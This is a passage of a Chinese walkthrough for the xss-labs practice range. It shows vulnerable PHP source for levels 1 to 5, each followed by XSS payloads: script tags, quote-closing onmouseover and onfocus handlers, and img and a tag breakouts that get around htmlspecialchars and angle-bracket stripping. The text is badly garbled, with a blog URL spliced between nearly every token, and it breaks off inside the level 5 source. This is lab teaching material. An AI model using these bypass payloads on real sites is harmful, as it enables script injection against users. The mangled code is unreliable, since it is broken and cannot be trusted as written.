xss-labs靶场全通关
- 前言
- level 1
- level 2
- level 3
- level 4
- level 5
- level 6
- level 7
- level 8
- level 9
- level 10
- level 11
- level 12
- level 13
- level 14
- level 15
- level 16
- level 17
- level 18
- level 19
- level 20
前言
所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs
点击图片开始你的xss之旅吧!
level 1
源码:
body>https://blog.csdn.net/m0_52051132/article/details/h1 align=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/欢迎来到level1/https://blog.csdn.net/m0_52051132/article/details/h1>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"name"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "欢迎用户"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/$str.https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level1.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpecho "payload的长度:"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/strlenhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/body>https://blog.csdn.net/m0_52051132/article/details/
分析:没有做任何过滤
payload为:name=https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/
level 2
源码:
?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "没有找到和"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果. "https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level2.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/"搜索"https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level2.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/
分析:有两处输出,第一处在PHP代码块的echo中输出,第二处在表单input中输出,第 一处用htmlspeciachars()做了转义,第二处并没有做限制,让payload在第二处起效果就 好,有2种方法。
1.不逃逸input标签闭合前边的双引号加个事件触发xss即可:
移动下鼠标即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " line-height: 160%; box-sizing: content-box;"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ 点击输入框即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " line-height: 160%; box-sizing: content-box;"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ 击输入框即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " οnfοcus="https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/
逃逸出input标签执行另外的标签触发xss即可:
用img>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/!https://blog.csdn.net/m0_52051132/article/details/ >https://blog.csdn.net/m0_52051132/article/details/用img>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">:https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/">https://blog.csdn.net/m0_52051132/article/details/ //浏览器可能会 过滤这个https://blog.csdn.net/m0_52051132/article/details/用a>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">https://blog.csdn.net/m0_52051132/article/details/a >https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/用a>https://blog.csdn.net/m0_52051132/article/details/标签payload为:https://blog.csdn.net/m0_52051132/article/details/a >https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/ // 移动鼠标至框内https://blog.csdn.net/m0_52051132/article/details/
level 3
源码:
?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "没有找到和"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果. "https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level3.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/'".htmlspecialchars($str)."'https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/";https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level3.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/
分析:这次它将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和 尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果 的,而且源码中的value是用单引号,看来是有意让使用单引号。
payload为:' οnmοuseοver='https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/ //其他payload省略https://blog.csdn.net/m0_52051132/article/details/
level 4
源码:
?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str2)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "没有找到和"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果. "https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level4.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str3.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/
分析:这里的俩个输出点,一个被转义,另外一个将尖括号替换为空,但是这并不影响 啊,按照上两题的套路,虽然不能闭合标签,单照样可以在input标签里边出发xss的
payload为:" οnmοuseοver="https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/ //鼠标点击输入框出发,其他payload 省略https://blog.csdn.net/m0_52051132/article/details/
level 5
源码:
?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ strtolowerhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"